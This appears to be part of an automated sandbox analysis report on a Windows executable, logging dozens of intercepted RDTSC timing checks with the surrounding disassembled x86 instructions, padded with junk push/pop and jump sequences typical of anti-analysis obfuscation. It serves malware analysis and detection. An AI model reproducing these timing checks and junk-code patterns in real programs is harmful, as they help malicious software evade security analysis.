Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 113C8CE second address: 113C8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11469E5 second address: 11469E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11469E9 second address: 11469F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11469F2 second address: 11469F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11469F8 second address: 1146A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 je 00007F87BC5165B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11452AD second address: 11452BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F87BD02CC86h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11452BC second address: 11452C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11452C0 second address: 11452DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC92h 0x00000007 jng 00007F87BD02CC86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1145756 second address: 114575F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 114575F second address: 1145763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1145A07 second address: 1145A29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F87BC5165BCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F87BC5165BEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1145A29 second address: 1145A35 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 114A5A4 second address: 114A5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F87BC5165C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 114A5C2 second address: 114A5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 114C5AA second address: 114C5CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007F87BC5165B6h 0x00000009 jmp 00007F87BC5165C7h 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 115792A second address: 115792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 115792E second address: 1157949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1157949 second address: 1157953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F87BD02CC86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1157953 second address: 115795D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F87BC5165B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 115795D second address: 1157978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F87BD02CC90h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1157978 second address: 1157990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F87BC5165C1h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1168462 second address: 1168482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F87BD02CC93h 0x0000000a ja 00007F87BD02CC86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 116A332 second address: 116A343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BC5165BBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 116A343 second address: 116A348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 116A348 second address: 116A34D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 116A05B second address: 116A05F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11709C0 second address: 11709C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11709C6 second address: 11709CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11709CA second address: 11709E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BC5165C3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11716FB second address: 1171701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1171701 second address: 1171730 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b jc 00007F87BC5165BCh 0x00000011 ja 00007F87BC5165B6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F87BC5165B6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1171730 second address: 1171734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1171897 second address: 11718A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11718A8 second address: 11718AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11718AC second address: 11718DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 jl 00007F87BC5165B8h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11718DC second address: 11718E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F87BD02CC86h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11718E8 second address: 11718EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11718EE second address: 11718F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11718F8 second address: 11718FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 117319E second address: 11731A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11731A2 second address: 11731B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11731B9 second address: 11731EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007F87BD02CC8Ch 0x0000000c jmp 00007F87BD02CC92h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jl 00007F87BD02CC9Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11731EF second address: 117320C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BC5165C1h 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F87BC5165B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 117320C second address: 1173210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1173210 second address: 1173216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 11779B9 second address: 11779BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 117ACA3 second address: 117ACAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 117ACAA second address: 117ACE5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F87BD02CC86h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007F87BD02CCB2h 0x00000014 pushad 0x00000015 jne 00007F87BD02CC86h 0x0000001b push esi 0x0000001c pop esi 0x0000001d jmp 00007F87BD02CC92h 0x00000022 popad 0x00000023 pushad 0x00000024 jnc 00007F87BD02CC86h 0x0000002a push edx 0x0000002b pop edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 117A7E5 second address: 117A7EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 117A7EC second address: 117A7F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED06E2 second address: 5ED06E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F0002A second address: 5F0002E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F0002E second address: 5F00034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00034 second address: 5F000C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F87BD02CC96h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F87BD02CC8Eh 0x00000018 or cx, 6998h 0x0000001d jmp 00007F87BD02CC8Bh 0x00000022 popfd 0x00000023 mov cx, 134Fh 0x00000027 popad 0x00000028 xchg eax, ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F87BD02CC97h 0x00000032 and eax, 0D1FB70Eh 0x00000038 jmp 00007F87BD02CC99h 0x0000003d popfd 0x0000003e mov ch, CCh 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F000C5 second address: 5F000E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F87BC5165C0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F000E2 second address: 5F0016B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b pushad 0x0000000c call 00007F87BD02CC95h 0x00000011 mov ecx, 6C63E7D7h 0x00000016 pop ecx 0x00000017 call 00007F87BD02CC8Dh 0x0000001c pushfd 0x0000001d jmp 00007F87BD02CC90h 0x00000022 sbb esi, 6F591D78h 0x00000028 jmp 00007F87BD02CC8Bh 0x0000002d popfd 0x0000002e pop eax 0x0000002f popad 0x00000030 push ebx 0x00000031 jmp 00007F87BD02CC94h 0x00000036 mov dword ptr [esp], edi 0x00000039 jmp 00007F87BD02CC90h 0x0000003e sub edi, edi 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F0016B second address: 5F0016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F0016F second address: 5F00175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00175 second address: 5F001F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F87BC5165C7h 0x0000000b xor ax, 0FFEh 0x00000010 jmp 00007F87BC5165C9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test dword ptr [ebp+0Ch], FFFF0000h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ax, bx 0x00000026 pushfd 0x00000027 jmp 00007F87BC5165BFh 0x0000002c xor si, E20Eh 0x00000031 jmp 00007F87BC5165C9h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F001F1 second address: 5F00220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F882CD4C1F3h 0x0000000f jmp 00007F87BD02CC8Eh 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00220 second address: 5F002A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov ecx, edi 0x0000000d mov cx, dx 0x00000010 popad 0x00000011 push 3A56236Ch 0x00000016 jmp 00007F87BC5165C2h 0x0000001b xor dword ptr [esp], 3A56A32Ch 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F87BC5165BEh 0x00000029 add eax, 10793078h 0x0000002f jmp 00007F87BC5165BBh 0x00000034 popfd 0x00000035 mov edx, eax 0x00000037 popad 0x00000038 xchg eax, edi 0x00000039 pushad 0x0000003a pushad 0x0000003b mov edi, ecx 0x0000003d push eax 0x0000003e pop edi 0x0000003f popad 0x00000040 call 00007F87BC5165C6h 0x00000045 mov di, si 0x00000048 pop esi 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c mov esi, 493877D9h 0x00000051 push eax 0x00000052 push edx 0x00000053 mov al, 6Dh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F002A2 second address: 5F002B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, edi 0x00000008 pushad 0x00000009 popad 0x0000000a xchg eax, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F002B2 second address: 5F002E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F87BC5165C9h 0x0000000a sbb si, 7686h 0x0000000f jmp 00007F87BC5165C1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F002E8 second address: 5F00351 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F87BD02CC97h 0x00000009 adc esi, 5577D5BEh 0x0000000f jmp 00007F87BD02CC99h 0x00000014 popfd 0x00000015 call 00007F87BD02CC90h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F87BD02CC97h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00351 second address: 5F00380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3C07168Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 popad 0x00000011 push 00000003h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F87BC5165C8h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00380 second address: 5F00384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00384 second address: 5F0038A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F003BA second address: 5EF0A30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F87BD02CC8Ch 0x00000011 and al, FFFFFF98h 0x00000014 jmp 00007F87BD02CC8Bh 0x00000019 popfd 0x0000001a mov ah, 80h 0x0000001c popad 0x0000001d leave 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F87BD02CC91h 0x00000025 adc al, 00000036h 0x00000028 jmp 00007F87BD02CC91h 0x0000002d popfd 0x0000002e call 00007F87BD02CC90h 0x00000033 mov edi, esi 0x00000035 pop ecx 0x00000036 popad 0x00000037 retn 0008h 0x0000003a mov dword ptr [ebp-18h], eax 0x0000003d push 00007F00h 0x00000042 push 00000000h 0x00000044 call 00007F87BD02D815h 0x00000049 jmp 00007F87C2B1BAB2h 0x0000004e mov edi, edi 0x00000050 pushad 0x00000051 mov dh, ch 0x00000053 mov dh, 1Eh 0x00000055 popad 0x00000056 xchg eax, ebp 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b pop edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0A30 second address: 5EF0A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F87BC5165C2h 0x0000000f adc ch, 00000018h 0x00000012 jmp 00007F87BC5165BBh 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F87BC5165C9h 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F87BC5165BDh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0A8B second address: 5EF0B0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, E4F2h 0x00000007 mov ax, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 jmp 00007F87BD02CC8Bh 0x00000015 pushfd 0x00000016 jmp 00007F87BD02CC98h 0x0000001b xor cl, 00000038h 0x0000001e jmp 00007F87BD02CC8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 jmp 00007F87BD02CC96h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F87BD02CC8Ch 0x00000035 or si, 1CC8h 0x0000003a jmp 00007F87BD02CC8Bh 0x0000003f popfd 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0B0A second address: 5EF0B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0B0F second address: 5EF0B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0B1F second address: 5EF0B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F87BC5165C6h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0B3B second address: 5EF0B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 jmp 00007F87BD02CC93h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bh, 9Dh 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0B60 second address: 5EF0B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0B7A second address: 5EF0B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b mov cx, dx 0x0000000e pop ebx 0x0000000f mov cx, 78EBh 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F87BD02CC8Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EF0B9E second address: 5EF0BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F87BC5165C7h 0x00000009 jmp 00007F87BC5165C3h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
